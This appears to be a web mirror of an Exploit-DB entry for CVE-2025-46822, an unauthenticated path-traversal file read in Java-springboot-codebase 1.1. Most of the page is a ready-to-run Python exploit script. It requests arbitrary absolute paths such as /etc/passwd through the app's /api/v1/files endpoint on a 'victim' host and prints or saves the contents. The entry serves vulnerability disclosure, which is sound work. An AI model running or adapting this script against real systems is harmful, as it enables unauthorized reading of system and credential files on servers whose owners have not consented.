Java-springboot-codebase 1.1 – Arbitrary File Read

May 25, 2025 invoker category_exploit

Exploit Details

Basic Information

Exploit Title Java-springboot-codebase 1.1 – Arbitrary File Read
Exploit ID EDB-ID:52304
Type exploitdb
Published 2025-05-25T00:00:00
Modified 2025-05-25T00:00:00

CVSS Information

CVSS Score 7.7
Severity HIGH
Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:N/SI:N/VA:N/SA:N/E:P

CVE Information

  • CVE-2025-46822

Exploit Description

Exploit Title: Java-springboot-codebase 1.1 – Arbitrary…

Exploit Code

# Exploit Title: Java-springboot-codebase 1.1 – Arbitrary File Read

# Google Dork:

# Date: 23/May/2025

# Exploit Author: d3sca

# Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase

# Software Link: https://github.com/OsamaTaher/Java-springboot-codebase

# Version: [app version] 1.1

# Tested on: Debian Linux

# CVE : CVE-2025-46822

#usage: python3 cve-2025-46822.py http://victim.com /etc/passwd

import argparse

import requests

from urllib.parse import quote

def exploit(target, file_path, output=None):

# Ensure the file path is absolute

if not file_path.startswith(‘/’):

print(“[!] Warning: File path is not absolute. Prepending ‘/’ to make it absolute.”)

file_path = ‘/’ + file_path.lstrip(‘/’)

# URL-encode the file path

encoded_path = quote(file_path, safe=”)

# Construct the target URL

endpoint = f”/api/v1/files/{encoded_path}”

url = target.rstrip(‘/’) + endpoint

print(f”[*] Attempting to retrieve: {file_path}”)

print(f”[*] Sending request to: {url}”)

try:

response = requests.get(url, allow_redirects=False, timeout=10)

if response.status_code == 200:

print(“[+] File retrieved successfully!”)

if output:

with open(output, ‘wb’) as f:

f.write(response.content)

print(f”[+] Content saved to: {output}”)

else:

print(“\nFile contents:”)

print(response.text)

else:

print(f”[-] Failed to retrieve file. Status code: {response.status_code}”)

print(f”[-] Response: {response.text[:200]}”) # Show first 200 chars of response

except Exception as e:

print(f”[-] An error occurred: {str(e)}”)

if name == “main”:

parser = argparse.ArgumentParser(description=”Exploit Path Traversal Vulnerability in Unauthenticated File API”)

parser.add_argument(“target”, help=”Target base URL (e.g., http://victim:8080)”)

parser.add_argument(“file_path”, help=”Absolute path to target file (e.g., /etc/passwd)”)

parser.add_argument(“-o”, “–output”, help=”Output file to save contents”)

args = parser.parse_args()

exploit(args.target, args.file_path, args.output)

View Full Exploit Details

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.